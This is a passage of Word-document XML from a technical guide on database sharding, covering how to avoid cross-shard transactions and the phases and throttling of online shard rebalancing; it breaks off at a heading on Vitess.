        <w:t xml:space="preserve">    -- Cross-shard transaction required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260049F1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742177AB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Solution 1: Redesign to avoid the cross-shard transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F8C226" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Introduce a transfer_requests table (sharded by transfer_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3CFC5A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Saga: debit A (Shard 1) → create transfer_request → credit B (Shard 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA9ECA7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Each step is a single-shard transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E881FB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Accept eventual consistency (intermediate state visible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CF66AF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A2FBA6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Solution 2: Co-locate data that frequently transacts together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9CF25C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  E-commerce: user_id is the shard key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0A9236" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    users, orders, cart, addresses, payment_methods → all sharded by user_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2397CC7A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    → Most transactions (place order, update cart, change address) are single-shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118C3A44" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA4034A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  What doesn't collocate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1F1DC0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Inventory (product-scoped, not user-scoped) → separate shard key or service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC52FDC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Cross-user transactions → saga or 2PC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C9CDFC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF005D5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Solution 3: Accept limited cross-shard guarantees for specific operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1C6238" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Use 2PC for critical cross-shard transactions (financial transfers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F0CDC4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Accept saga for less critical cross-shard operations (order fulfillment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C12C6B8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Design metrics to track saga failure rates and compensations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275E7E0D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="76966966">
          <v:rect id="_x0000_i5858" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F168047" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5. Rebalancing — The Operational Marathon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D440F8A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why Rebalancing Is Necessary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471502C4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>As a sharded system grows, the initial shard distribution becomes uneven:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C17E6AF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF97403" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Causes of imbalance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE43F8C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Data growth: some shards grow faster (popular tenants, hot key ranges)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E66E15B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Adding shards: new shards start empty, existing shards remain overloaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE057DE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Deleting data: shard becomes smaller after bulk deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7897CA91" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Hotspots: specific keys receive disproportionate traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72432498" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DFC83E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Symptoms of imbalance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6811B116" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  One shard at 90% CPU while others at 20%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C38C89" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  One shard with 10× the data of others</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF31AB2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  p99 latency dominated by the hot shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6253D79C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  One shard approaching storage limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4583574F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB95128" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Response: rebalance (migrate data between shards)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126B551C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Online Rebalancing — The Core Engineering Challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AACC407" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Moving data between shards while the system continues serving live traffic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E90482" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565E9909" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Rebalancing a key range from Shard A to Shard B:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0621D5C0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="5B11D44E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Phase 1 — Copy (background, no downtime):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560A9EF5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard B reads all data in the key range from Shard A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7081090C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Large batch reads: SELECT * FROM table WHERE shard_key BETWEEN X AND Y ORDER BY shard_key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21450EB7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Write to Shard B in batches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715257F9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F05CEF5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Concurrently: writes to this key range still go to Shard A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE1959A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  New writes during copy: captured in a change log (Shard A WAL or separate change tracking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1534ED85" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A88C01D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Phase 2 — Catchup (apply accumulated changes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3EE63C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Apply all changes that occurred during Phase 1 to Shard B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17137380" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  These are "delta" changes: inserts, updates, deletes during the copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6042B7F6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Use WAL streaming or CDC to consume changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9836A0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C74854C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard A continues receiving writes during this phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2A811C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Change rate decreases as catchup reduces lag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A7FA78" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    If Shard B can apply changes faster than they arrive: lag decreases to zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4140ABA1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    If not: Shard B never catches up → must throttle Shard A writes (brief pause)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690517C0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036D1FE8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Phase 3 — Cutover (brief pause, atomically switch):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6DC420" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Pause all writes to the key range (brief stop-the-world for this range)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A09C5FB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Apply final delta: all remaining changes from Shard A to Shard B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FD1D88" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Update routing: key range → Shard B (update directory or consistent hash ring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70629ABB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Resume writes: all now go to Shard B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D6FE35" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE2FDE8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Duration of pause: depends on final delta size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4233B880" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Well-managed migration: pause &lt; 1 second (only final few milliseconds of changes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5539CCDB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Poorly managed: pause = seconds to minutes (large accumulated delta)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2574DCE7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4B609D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Phase 4 — Cleanup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C62094" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Verify Shard B has all data (compare checksums or row counts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DCBACA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Delete data from Shard A (it's now on Shard B)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF695DF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E07895" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Important: don't delete immediately — keep backup copy for N hours</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127ECD8A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  in case rollback is needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259FDFB5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rate limiting the copy — protecting production traffic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0155DB8E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D47DEC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Rebalancing is a background operation — it must not starve production queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EFAE6F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="2D03CC9D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Control mechanisms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CD7948" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Read throttling on Shard A: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B27541" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Copy reads consume I/O bandwidth → throttle to X% of I/O capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77491DFE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    PostgreSQL: pg_dump with --lock-wait-timeout, external throttling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B10A23E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582CFFDC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Write throttling on Shard B:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516084DF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Bulk inserts consume write throughput → batch inserts at controlled rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED632B4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    INSERT batches of 1000 rows with sleep between batches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A641F78" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E183700" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  CPU limits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3202F74F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Copy process at lower CPU priority (nice/ionice on Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D6525D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Ensures production query CPU is not stolen by migration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57228A42" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631EE2F6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Monitoring during migration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F5E12B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Watch shard latency p99 — if it spikes, slow down migration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCBF462" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Watch shard CPU — if &gt; 80%, pause migration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346B0B33" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Automatic throttle controller: PID controller adjusting copy rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099974D4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      based on observed shard latency and CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F239F90" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vitess (MySQL sharding layer) — production rebalancing:</w:t>
